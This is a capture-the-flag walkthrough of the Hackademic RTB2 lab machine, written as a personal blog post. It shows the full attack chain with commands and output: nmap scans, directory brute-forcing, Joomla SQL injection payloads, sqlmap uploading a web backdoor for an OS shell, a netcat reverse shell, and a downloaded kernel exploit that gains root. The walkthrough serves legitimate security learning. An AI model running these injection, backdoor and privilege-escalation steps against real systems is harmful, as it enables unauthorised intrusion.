Hackademic: RTB2 – Walkthrough

This is the series 2 of Hackademic. Sure,It is Happy New Year walkthrough for me. Normally i really love sitting in front of my computer. My girlfriends also away from me so what am i doing right now.

I love the pain and try to write walkthrough at this time. Eventually, I am not good at english but still learning to explain for my reader. Cos,My childhood is so trouble.I am so late to enter the Computer field. I start at 25 year and try to learn many that i interest . Ok. Talk Less, Do More.

 

After discovering my local network i know my target is 192.168.2.101 and scan with nmap.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:40 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000075s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Normally port 80 is open but 666 port is filtered,

filtered meaning is firewall for packet filtering prevents.

Ok. We try nmap other option to filter bypass. I try to use MTU(Maximun Transmission Unit) to the packet bypass.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap -mtu 24 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:46 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000098s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

Yes. now both are opening. Try first with dirb scan.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:48:22 2017
URL_BASE: http://192.168.2.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.101/ ----
+ http://192.168.2.101/cgi-bin/ (CODE:403|SIZE:289)                            
+ http://192.168.2.101/check (CODE:200|SIZE:324)                               
+ http://192.168.2.101/index (CODE:200|SIZE:1324)                              
+ http://192.168.2.101/index.php (CODE:200|SIZE:1324)                          
==> DIRECTORY: http://192.168.2.101/javascript/                                
==> DIRECTORY: http://192.168.2.101/phpmyadmin/                                
                     

-----------------
END_TIME: Sun Dec 31 20:48:47 2017
DOWNLOADED: 46120 - FOUND: 11

Found phpmyadmin database login. But try to scan again the port 666.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101:666

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:50:41 2017
URL_BASE: http://192.168.2.101:666/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.101:666/ ----
==> DIRECTORY: http://192.168.2.101:666/administrator/                                                                 
==> DIRECTORY: http://192.168.2.101:666/cache/                                                                         
+ http://192.168.2.101:666/cgi-bin/ (CODE:403|SIZE:290)                                                                
==> DIRECTORY: http://192.168.2.101:666/components/                                                                    
+ http://192.168.2.101:666/configuration (CODE:200|SIZE:0)                                                             
==> DIRECTORY: http://192.168.2.101:666/images/                                                                        
==> DIRECTORY: http://192.168.2.101:666/includes/                                                                      
+ http://192.168.2.101:666/index (CODE:200|SIZE:6118)                                                                  
+ http://192.168.2.101:666/index.php (CODE:200|SIZE:6118)                                                              
+ http://192.168.2.101:666/index2 (CODE:200|SIZE:3559)                                                                 
==> DIRECTORY: http://192.168.2.101:666/javascript/                                                                    
==> DIRECTORY: http://192.168.2.101:666/language/                                                                      
==> DIRECTORY: http://192.168.2.101:666/libraries/                                                                     
+ http://192.168.2.101:666/LICENSE (CODE:200|SIZE:17816)                                                               
==> DIRECTORY: http://192.168.2.101:666/logs/                                                                          
==> DIRECTORY: http://192.168.2.101:666/media/                                                                         
==> DIRECTORY: http://192.168.2.101:666/modules/                                                                       
==> DIRECTORY: http://192.168.2.101:666/phpmyadmin/                                                                    
==> DIRECTORY: http://192.168.2.101:666/plugins/                                                                       
+ http://192.168.2.101:666/robots (CODE:200|SIZE:304)                                                                  
+ http://192.168.2.101:666/robots.txt (CODE:200|SIZE:304)                                                              
+ http://192.168.2.101:666/server-status (CODE:403|SIZE:295)                                                           
==> DIRECTORY: http://192.168.2.101:666/templates/                                                                     
==> DIRECTORY: http://192.168.2.101:666/tmp/

Interesting files are again! Check at the web browser.

First I try to port 80. I found user login,Try to login with sql login query but fail and I try to brute the username and password.It also fail after few minutes. So i check another port 666.

http://192.168.2.101:666/

I notice the icon at the title.Yes,It is joomla CMS. Explore some link on the site and i found the vulnerable at the letter paramter. Try to test vulnerable or not with single quote.

http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3

Boom! Error message greeting to me.

Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY title ORDER BY title' at line 1 SQL=SELECT id, title FROM jos_content WHERE state = 1 AND UPPER(title) LIKE 'List of content items...'%' GROUP BY title ORDER BY title
LIST OF CONTENT ITEMS...'

Now time to exploit with sql map. Normally i try to find the current user, database name, tables and columns to dump the data but now i try first it allow os-shell upload.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> sqlmap -u "http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -p letter --is-dba --os-shell

 

[*] starting at 21:02:13

[21:02:14] [INFO] resuming back-end DBMS 'mysql' 
[21:02:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 5790 FROM(SELECT COUNT(*),CONCAT(0x716b706271,(SELECT (ELT(5790=5790,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ycDm'='ycDm&Itemid=3

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT CONCAT(0x716b706271,0x474b72455870676847716549514648576d77676c486b454d41696d6e786c65714d4143534855416f,0x7162767a71),NULL-- TSkf&Itemid=3
---
[21:02:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:02:14] [INFO] testing if current user is DBA
[21:02:14] [INFO] fetching current user
current user is DBA:    True
[21:02:14] [INFO] going to use a web backdoor for command prompt
[21:02:14] [INFO] fingerprinting the back-end DBMS operating system
[21:02:14] [WARNING] reflective value(s) found and filtering out
[21:02:14] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[21:02:32] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[21:02:34] [INFO] retrieved web server absolute paths: '/index~.php'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:02:34] [WARNING] unable to upload the file stager on '/var/www/'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[21:02:35] [WARNING] expect junk characters inside the file as a leftover from UNION query
[21:02:35] [INFO] the remote file '/var/www/tmpuuyqk.php' is larger (701 B) than the local file '/tmp/sqlmap5AvFX01768/tmpezMiOe' (700B)
[21:02:35] [INFO] heuristics detected web page charset 'ascii'
[21:02:35] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpuuyqk.php
[21:02:35] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpbkdzx.php
[21:02:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Dec 31 16:32 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 [email protected]$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rwxr-xr-x  1 www-data www-data   908 Dec 31 16:32 tmpbkdzx.php
-rw-rw-rw-  1 mysql    mysql        0 Dec 31 16:32 tmpukgwv.php
-rw-rw-rw-  1 mysql    mysql      701 Dec 31 16:32 tmpuuyqk.php
drwxrwxrwx  2 root     root      4096 Jan 29  2011 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html
---
os-shell> 

Now try to back connect with python,

─[[email protected]]─[~/Desktop/rtb2]
└──> nc -lvp 6666
listening on [any] 6666 ...
192.168.2.101: inverse host lookup failed: Unknown host
connect to [192.168.2.118] from (UNKNOWN) [192.168.2.101] 37336
/bin/sh: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www$ id;uname -a
id;uname -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
[email protected]:/var/www$

Try to find kernal exploit at exploit db. I notice last walkthrough kernal vesion exploit can be work. Ok,Try it.

drwx------  2 gdm  gdm  4096 Dec 31  2017 pulse-PKdhtXMmr18n
[email protected]:/tmp$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
<p$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
--2017-12-31 16:37:22--  https://www.exploit-db.com/raw/15285
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `lol.c'

100%[======================================>] 7,155       --.-K/s   in 0s      

2017-12-31 16:37:23 (500 MB/s) - `lol.c' saved [7155/7155]

[email protected]:/tmp$ gcc lol.c
gcc lol.c
[email protected]:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp$ ./a.out
./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08cac4c
 [+] Resolved default_security_ops to 0xc0773340
 [+] Resolved cap_ptrace_traceme to 0xc02f5060
 [+] Resolved commit_creds to 0xc016dd80
 [+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id;whoami
id;whoami
uid=0(root) gid=0(root)
root

Bango! Time to read the flag under the root file. Finally,I decode the base64 and get the secret photo!.

Thanks for reading, Happy Hacking!